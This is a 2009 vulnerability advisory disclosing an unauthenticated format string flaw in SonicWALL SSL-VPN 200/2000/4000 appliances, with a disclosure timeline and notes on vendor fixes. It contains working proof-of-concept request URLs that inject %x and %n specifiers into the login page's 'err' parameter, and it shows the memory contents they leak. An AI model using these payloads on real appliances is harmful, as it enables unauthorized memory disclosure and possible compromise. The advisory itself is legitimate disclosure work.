SonicWALL Format String Vulnerability

`aushack.com - Vulnerability Advisory  
-----------------------------------------------  
Release Date:  
29-May-2009  
  
Software:  
SonicWALL - SSL-VPN Remote Access  
http://www.sonicwall.com/  
  
Description:  
"SonicWALL SSL VPN appliances provide small and mid-size organizations an  
easy-to-use, secure and affordable remote access solution that requires no  
pre-installed client software. Utilizing a standard Web browser, authorized  
users such as employees, contractors, partners and customers, can easily and  
securely access e-mail, files, intranets, Web and legacy applications  
and remote desktops from any location."  
  
Versions affected:  
SonicWALL SSL-VPN 2000/4000 3.5.0.4 and below.  
SonicWALL SSL-VPN 200 3.0.0.8 and below.  
  
  
Vulnerability discovered:  
  
Format string vulnerability.  
  
Vulnerability impact:  
  
High - Remote code execution, and the ability to remotely map out the  
internal memory structures.  
  
Vulnerability information:  
  
This vulnerability allows remote attackers to execute format string specifiers  
on the remote appliance as an unauthenticated user.  
  
The device uses a HTML form, where failed authentication results in an error:  
"Login failed - Incorrect name/password"  
  
https://[target]/cgi-bin/welcome/VirtualOffice?err=Login%20failed%20-%20Incorrect%20name%2Fpassword  
  
By inserting format strings instead of expected input, the statement  
is interpreted  
by printf() and the result is returned in a HTTP GET response.  
  
Examples:  
  
The following GET request will result in "ABCD0044434241" being returned.  
  
https://[target]/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x  
  
0x44434241 is the little endian hexadecimal representation for ABCD.  
  
It is possible to read memory remotely by specifying further format  
strings, such as:  
  
https://[target]/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x  
  
returns  
  
"007825782578257825782578257825782578257825782578257825782578257825782578257825782578257825782578254007120040304d8cbffff22840221389804b1e04007127925000"  
  
This may reveal sensitive information.  
  
Attempts to write to memory result in an error, indicating that an  
access violation  
may have occurred, therefore remote code execution is likely possible  
with further research (i.e. physical access :).  
  
https://[target]/cgi-bin/welcome/VirtualOffice?err=%n  
  
"Sorry, the SSL-VPN you are trying to reach is unavailable at this  
time. Please try again later."  
  
References:  
aushack.com advisory  
http://www.aushack.com/200905-sonicwall.txt  
  
Credit:  
Patrick Webster ( [email protected] )  
  
Disclosure timeline:  
12-Jan-2009 - Discovered during audit.  
09-Feb-2009 - 1st email sent to [email protected]. No response.  
27-Feb-2009 - 2nd email sent to [email protected]. No response.  
01-May-2009 - Asked contacts within the security industry for  
SonicWALL contact.  
07-May-2009 - Received email from SonicWALL contact.  
08-May-2009 - Sent details to SonicWALL contact.  
15-May-2009 - SSL 200 - 3.0.0.9 fix released.  
27-May-2009 - SSL 2000/4000 - 3.5.0.5 fix released.  
29-May-2009 - Public disclosure.  
  
EOF  
`